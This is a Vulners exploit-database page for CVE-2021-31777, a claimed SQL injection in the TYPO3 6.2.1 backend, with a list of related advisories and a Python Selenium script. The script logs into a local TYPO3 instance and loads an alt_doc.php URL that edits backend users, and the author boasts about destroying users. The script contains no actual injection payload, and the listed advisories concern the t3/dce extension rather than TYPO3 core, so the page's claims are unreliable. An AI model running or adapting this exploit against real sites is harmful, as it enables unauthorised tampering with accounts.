Vulners
Lucene search
TYPO3 6.2.1 SQL Injection Exploit
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2021-31777 | 5 May 202107:13 | – | circl |
 | TYPO3 Dynamic Content Element SQL注入漏洞 | 27 Apr 202100:00 | – | cnnvd |
 | TYPO3 Dynamic Content Element SQL注入漏洞 | 28 Apr 202100:00 | – | cnvd |
 | CVE-2021-31777 | 28 Apr 202106:24 | – | cve |
 | CVE-2021-31777 | 28 Apr 202106:24 | – | cvelist |
 | EUVD-2021-1272 | 7 Oct 202500:30 | – | euvd |
 | SQL Injection in t3/dce | 8 Jun 202120:12 | – | github |
 | CVE-2021-31777 | 28 Apr 202107:15 | – | nvd |
 | CVE-2021-31777 | 28 Apr 202107:15 | – | osv |
| GHSA-5V5H-4W2G-GXXC SQL Injection in t3/dce | 8 Jun 202120:12 | – | osv |
10
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Vendor: https://typo3.org/
# Link: https://get.typo3.org/version/6.2.1
# CVE: CVE-2021-31777
# Proof: https://streamable.com/8v7v4i
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-31777
from selenium import webdriver
import time
import os, sys
# Vendor: https://typo3.org/
website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"
# enter your login username
username="nu11secur1ty"
# enter your login password
password="password"
#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="p_field"
#enter the element for submit button
element_for_submit="commandLI"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(3)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL user table by using backend.php vulnerability
time.sleep(3)
# Payload link
browser.get(("
http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"))
print("The payload is deployed it is time to destroy some user...\n")
os.system('pause')
browser.close()
except Exception:
#### This exception is if the user is not found in the database or
something is wrong.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")
---------------------------------
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on
backend.php
# Date: 05.02.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://typo3.org/
# Software Link: https://get.typo3.org/version/6.2.1
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777
# 0day.today [2021-11-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2021 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24
CVSS 3.14.9
EPSS0.00287